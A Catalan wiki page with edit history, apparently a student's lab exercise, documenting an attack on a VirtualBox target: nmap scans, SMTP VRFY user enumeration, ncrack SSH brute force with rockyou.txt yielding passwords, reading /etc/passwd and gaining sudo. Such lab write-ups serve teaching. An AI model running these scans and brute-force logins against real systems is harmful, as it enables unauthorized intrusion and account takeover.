Guillem: Guillem ha mogut M16/UF2/EX3/3 a ASIX/M16/UF2/EX3/3 sense deixar una redirecció: Crear subnivell ASIX

2020-04-15T11:33:55Z

Guillem ha mogut M16/UF2/EX3/3 a ASIX/M16/UF2/EX3/3 sense deixar una redirecció: Crear subnivell ASIX

Guillem a 12:55, 17 març 2019

2019-03-17T12:55:46Z

Guillem a 12:55, 17 març 2019

2019-03-17T12:55:39Z

Mostra els canvis

Guillem: Es crea la pàgina amb «==Anàlisi general== Primer de tot, podem executar un `nmap` a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina...».

2019-03-17T12:53:27Z

Es crea la pàgina amb «==Anàlisi general== Primer de tot, podem executar un <code>nmap</code> a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina...».

Pàgina nova

==Anàlisi general==
Primer de tot, podem executar un <code>nmap</code> a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem
<source>
root@kali-gsb:~# nmap 10.16.2.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 12:21 CET
Nmap scan report for 10.16.2.1
Host is up (0.00038s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
53/tcp open domain
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)

Nmap scan report for 10.16.2.2
Host is up (0.00064s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
631/tcp open ipp
3306/tcp open mysql
8010/tcp open xmpp
8888/tcp open sun-answerbook
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)

Nmap scan report for 10.16.2.3
Host is up (0.00043s latency).
All 1000 scanned ports on 10.16.2.3 are filtered
MAC Address: 08:00:27:1D:7B:F3 (Oracle VirtualBox virtual NIC)

Nmap scan report for 10.16.2.9
Host is up (0.00038s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
110/tcp open pop3
143/tcp open imap
389/tcp open ldap
993/tcp open imaps
995/tcp open pop3s
MAC Address: 08:00:27:DB:66:F2 (Oracle VirtualBox virtual NIC)

Nmap scan report for 10.16.2.11
Host is up (0.0000060s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.38 seconds
</source>

Deduïm que la màquina d'enumeració és la que es troba a <code>10.16.2.9</code> ja que la resta no tenen serveis publicats o bé és el Kali mateix,

==Anàlisi acotat==
Una vegada fet això, podem executar <code>nmap</code> de nou contra aquella màquina concreta per a llistar en detall els serveis que s'hi estan executant
<source>
root@kali-gsb:~# nmap 10.16.2.9 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 12:22 CET
Nmap scan report for 10.16.2.9
Host is up (0.00036s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.5 (Ubuntu Linux)
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd (Ubuntu)
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
MAC Address: 08:00:27:DB:66:F2 (Oracle VirtualBox virtual NIC)
Service Info: Host: enum.iescarlesvallbona.cat; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.84 seconds
</source>

==Anàlisi de serveis==
===SMTP===
Veiem que hi ha obert un servidor SMTP. Segons apunts de la UF, podem provar si la comanda <code>VRFY <usuari></code> es permet i podem extreure algun usuari relacionat amb l'organització des d'on s'ha extret aquesta màquina (Institut Carles Vallbona)
<source>
root@kali-gsb:~# telnet 10.16.2.9 25
Trying 10.16.2.9...
Connected to 10.16.2.9.
Escape character is '^]'.
220 enum.iescarlesvallbona.cat ESMTP Postfix (Ubuntu)
VRFY roger
252 2.0.0 roger
VRFY pau
252 2.0.0 pau
VRFY julian
252 2.0.0 julian
VRFY jaume
252 2.0.0 jaume
VRFY guillem
550 5.1.1 <guillem>: Recipient address rejected: User unknown in local recipient table
</source>

Veiem, manualment, que aquests usuaris existeixen excepte ''guillem''. Això ens pot ser suficient per a provar d'extreure contrasenyes dels usuaris mitjançant força bruta a través del servei SSH per exemple.

Una altra opció seria utilitzar ''scripts'' o mòduls de NMap per a passar-li llistes d'usuaris i que ens retorni si existeixen al sistema o no.

===SSH===
Amb <code>ncrack</code> provarem d'accedir per SSH amb algun usuari que tingui una contrasenya feble o vulnerable present al ''wordlist'' de Kali ''rockyou.txt''
<source>
root@kali-gsb:~# ncrack -p 22 -user roger -P /usr/share/wordlists/rockyou.txt 10.16.2.9

Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-17 12:30 CET

Discovered credentials for ssh on 10.16.2.9 22/tcp:
10.16.2.9 22/tcp ssh: 'roger' 'whatever'

Ncrack done: 1 service scanned in 3.00 seconds.

Ncrack finished.
</source>

Hem trobat que l'usuari ''roger'' té la contrasenya ''whatever''.

El següent pas serà accedir per SSH amb aquestes credencials i mirar si tenim permisos per llegir l'arxiu <code>/etc/passwd</code> i poder així, llistar la resta d'usuaris del sistema en la seva totalitat.
<source>
root@kali-gsb:~# ssh roger@10.16.2.9
roger@10.16.2.9's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Mar 17 11:32:39 UTC 2019

System load: 0.0 Processes: 98
Usage of /: 44.7% of 9.78GB Users logged in: 0
Memory usage: 4% IP address for enp0s3: 10.16.2.9
Swap usage: 0%

118 packages can be updated.
0 updates are security updates.

Last login: Sun Mar 17 11:30:24 2019 from 10.16.2.11
roger@enum:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
enum:x:1000:1000:enum:/home/enum:/bin/bash
julian:x:1001:1001:,,,:/home/julian:/bin/bash
pau:x:1002:1002:,,,:/home/pau:/bin/bash
jaume:x:1003:1003:,,,:/home/jaume:/bin/bash
xavi:x:1004:1004:,,,:/home/xavi:/bin/bash
roger:x:1005:1005:,,,:/home/roger:/bin/bash
bind:x:111:113::/var/cache/bind:/usr/sbin/nologin
Debian-snmp:x:112:114::/var/lib/snmp:/bin/false
postfix:x:113:116::/var/spool/postfix:/usr/sbin/nologin
dovecot:x:114:118:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:115:119:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
openldap:x:116:120:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
</source>

També podem provar si aquest usuari té permisos de ''sudo'':
<source>
roger@enum:~$ sudo nano /etc/passwd
[sudo] password for roger:
roger is not in the sudoers file. This incident will be reported.
</source>

L'usuari ''roger'' no està a <code>sudoers</code>, però al veure que es tracta d'un Ubuntu, podem deduir que l'usuari amb UID=1000 tindrà permisos de ''sudo''. Segons l'arxiu d'usuaris, aquest usuari correspon a ''enum'':
<source>
enum:x:1000:1000:enum:/home/enum:/bin/bash
</source>

Per tant, el següent pas, serà executar <code>ncrack</code> de nou amb l'usuari ''enum'' per veure si la contrasenya és present en aquell wordlist
<source>
root@kali-gsb:~# ncrack -p 22 -user enum -P /usr/share/wordlists/rockyou.txt 10.16.2.9

Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-17 12:30 CET

Discovered credentials for ssh on 10.16.2.9 22/tcp:
10.16.2.9 22/tcp ssh: 'enum' 'trustno1'

Ncrack done: 1 service scanned in 3.00 seconds.

Ncrack finished.
</source>

Accedirem per SSH amb la contrasenya que hem extret
<source>
root@kali-gsb:~# ssh enum@10.16.2.9
enum@10.16.2.9's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Mar 17 12:38:49 UTC 2019

System load: 0.31 Processes: 98
Usage of /: 45.5% of 9.78GB Users logged in: 0
Memory usage: 4% IP address for enp0s3: 10.16.2.9
Swap usage: 0%

118 packages can be updated.
0 updates are security updates.

Last login: Wed Feb 20 16:38:32 2019 from 10.16.2.8
</source>

Aleshores farem la mateixa prova que amb l'altre usuari: executar una comanda amb ''sudo'' per veure si podem fer un moviment vertical i arribar a poder administrar el sistema o modificar arxius dins del ''home'' de l'usuari ''root'':
<source>
sudo nano /root/prova.enum
</source>

Veiem que se'ns dóna permís.

← Versió més antiga		Revisió del 12:55, 17 març 2019
Línia 1:		Línia 1:
−	~~==Anàlisi general==~~
	Primer de tot, podem executar un <code>nmap</code> a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem		Primer de tot, podem executar un <code>nmap</code> a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem
	<source>		<source>

← Versió més antiga	Revisió del 11:33, 15 abr 2020
(Cap diferència)

ASIX/M16/UF2/EX3/3 - Historial de revisió

Guillem: Guillem ha mogut M16/UF2/EX3/3 a ASIX/M16/UF2/EX3/3 sense deixar una redirecció: Crear subnivell ASIX

Guillem a 12:55, 17 març 2019

Guillem a 12:55, 17 març 2019

Guillem: Es crea la pàgina amb «==Anàlisi general== Primer de tot, podem executar un nmap a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina...».

Guillem: Es crea la pàgina amb «==Anàlisi general== Primer de tot, podem executar un `nmap` a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina...».